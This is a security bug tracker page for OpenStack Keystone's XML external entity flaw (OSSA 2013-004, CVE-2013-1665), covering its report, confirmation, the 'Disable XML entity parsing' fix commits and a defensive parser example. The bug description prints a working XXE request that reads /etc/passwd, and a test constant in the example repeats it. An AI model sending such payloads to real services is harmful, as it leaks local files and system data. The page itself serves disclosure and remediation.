OpenStack Identity (Keystone)

[OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

Reported by Thierry Carrez on 2013-01-16
Affects                       Importance   Assigned to
Keystone                      High         Dolph Mathews
  Essex                       High         Dolph Mathews
  Folsom                      High         Dolph Mathews
OpenStack Security Advisory   Undecided    Thierry Carrez

Bug Description

Evil XML! Jonathan Murray from NCC Group reported that you can leak local file contents using XML entities in Keystone requests:

POST /v2.0//OS-KSDM/roles HTTP/1.1
x-auth-token: d0e1a2d3b4e5e6f7
content-type: application/xml

<!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:///etc/passwd"> ]>
<role>
<name>&ent;</name>
</role>

just returns the content of the local file in role.name.

Looks like we should disable parsing entities altogether, they seem to be exploitable in pretty awesome ways. I'm not sure only Keystone is affected by this.

Thierry Carrez (ttx) wrote :

Adding Joe Heck and Dan Prince for confirmation.

Thierry Carrez (ttx) wrote :

Dolph: I suspect your patch from bug 1100282 would solve that one as well?

Thierry Carrez (ttx) wrote :

Proposed combined impact description on bug 1100282.

Dolph Mathews (dolph) wrote :

Agree; fix for bug 1100282 solves this one as well on essex + folsom + master.

Changed in keystone:
assignee: nobody → Dolph Mathews (dolph)
status: New → Confirmed
Dolph Mathews (dolph) wrote :

There are a couple of typos in the example above, but I was able to use this method to read /etc/passwd through the API.

Dolph Mathews (dolph) wrote :

I also confirmed that the fix for bug 1100282 eliminates the issue.

Running that fix with the above example results in the service simply receiving an empty string for the role name.

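The behaviour the comments describe (entity parsing disabled, so the SYSTEM entity is never expanded) can be shown with a small deserializer that refuses any DTD before its entity declarations are even read. This is an added example, not Keystone's own code or the patch referenced in this bug; parse_role, is_rejected and the benign body are assumed/constructed for illustration, and only the Python standard library (pyexpat) is used.

```python
# Added example, not Keystone's own code: a request deserializer for a
# <role><name>..</name></role> body that refuses any DTD, so the SYSTEM
# entity in the report above is never declared, let alone expanded.
import xml.parsers.expat
from xml.parsers.expat import ExpatError, XML_PARAM_ENTITY_PARSING_NEVER

class UnsafeXML(ValueError):
    """The body carries a DOCTYPE, i.e. entity declarations."""

def parse_role(body):
    """Return {'name': text} for a <role> body; raise UnsafeXML on any DTD."""
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(XML_PARAM_ENTITY_PARSING_NEVER)  # no external DTD
    path, text = [], []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on "<!DOCTYPE" before any <!ENTITY> inside it is read; the
        # exception propagates out of Parse() and aborts the parse.
        raise UnsafeXML("DOCTYPE not allowed in API requests")

    def external_entity(context, base, sysid, pubid):
        return 0  # defence in depth: expat aborts instead of fetching the URI

    def chars(data):
        if path == ["role", "name"]:
            text.append(data)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = lambda tag, attrs: path.append(tag)
    parser.EndElementHandler = lambda tag: path.pop()
    parser.CharacterDataHandler = chars
    try:
        parser.Parse(body, True)
    except ExpatError as exc:  # e.g. an undefined &ent; with no DTD at all
        raise ValueError("malformed XML: %s" % exc) from None
    return {"name": "".join(text)}

def is_rejected(body):
    try:
        parse_role(body)
    except UnsafeXML:
        return True
    return False

# Request body quoted in the bug report above, copied as-is (typo included).
REPORTED_BODY = ('<!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:///etc/passwd"> ]>\n'
                 '<role>\n<name>&ent;</name>\n</role>\n')
BENIGN_BODY = '<role>\n<name>admin</name>\n</role>\n'  # constructed, well-formed
```

A body that omits the DOCTYPE but still references an undeclared entity is a plain parse error and surfaces as ValueError rather than UnsafeXML.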
Thierry Carrez (ttx) wrote :

OK, disclosure process will be handled on bug 1100282.

Mark McLoughlin (markmc) on 2013-01-22
Changed in keystone:
milestone: none → 2012.2.3
Mark McLoughlin (markmc) on 2013-01-25
Changed in keystone:
milestone: 2012.2.3 → none
Thierry Carrez (ttx) on 2013-01-30
Changed in keystone:
importance: Undecided → High
status: Confirmed → Triaged
Thierry Carrez (ttx) wrote :

Issue was independently reported by Stuart Stent as duplicate bug 1111828

Thierry Carrez (ttx) on 2013-02-19
summary: - Local file leak through entities in XML requests
+ Local file leak through entities in XML requests (CVE-2013-1665)
Thierry Carrez (ttx) on 2013-02-19
information type: Private Security → Public Security

Fix proposed to branch: stable/folsom
Review: https://review.openstack.org/22314

Changed in keystone:
status: Triaged → In Progress

Reviewed: https://review.openstack.org/22314
Committed: http://github.com/openstack/keystone/commit/8a2274595ac628b2373eab0cb14690f866b7a024
Submitter: Jenkins
Branch: stable/folsom

commit 8a2274595ac628b2373eab0cb14690f866b7a024
Author: Dolph Mathews <email address hidden>
Date: Tue Feb 19 09:04:11 2013 -0600

    Disable XML entity parsing

    Fixes bug 1100282 and bug 1100279.

    Change-Id: Ibf2d73bca17b689cfa2dfd29eb15ea6e7458a123

Reviewed: https://review.openstack.org/22315
Committed: http://github.com/openstack/keystone/commit/2afe8e46893ca27ea9d61f29419d0ec23a6d8db3
Submitter: Jenkins
Branch: master

commit 2afe8e46893ca27ea9d61f29419d0ec23a6d8db3
Author: Dolph Mathews <email address hidden>
Date: Tue Feb 19 09:00:40 2013 -0600

    Disable XML entity parsing

    Fixes bug 1100282 and bug 1100279.

    Change-Id: I6a7c9e7110e1c7890205d6e4550ab46295c68906

Changed in keystone:
status: In Progress → Fix Committed

Reviewed: https://review.openstack.org/22316
Committed: http://github.com/openstack/keystone/commit/8945567b5ec39c7f32f27aec4eccf230cc86646c
Submitter: Jenkins
Branch: stable/essex

commit 8945567b5ec39c7f32f27aec4eccf230cc86646c
Author: Dolph Mathews <email address hidden>
Date: Tue Feb 19 09:08:41 2013 -0600

    Disable XML entity parsing

    Fixes bug 1100282 and bug 1100279.

    Change-Id: Idd3989356dfededc3d863770f0ca1661c1d45782

Thierry Carrez (ttx) on 2013-02-21
Changed in keystone:
milestone: none → grizzly-3
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2013-04-04
Changed in keystone:
milestone: grizzly-3 → 2013.1
Thierry Carrez (ttx) on 2013-05-24
summary: - Local file leak through entities in XML requests (CVE-2013-1665)
+ [OSSA 2013-004] Local file leak through entities in XML requests
+ (CVE-2013-1665)
Changed in ossa:
assignee: nobody → Thierry Carrez (ttx)
status: New → Fix Released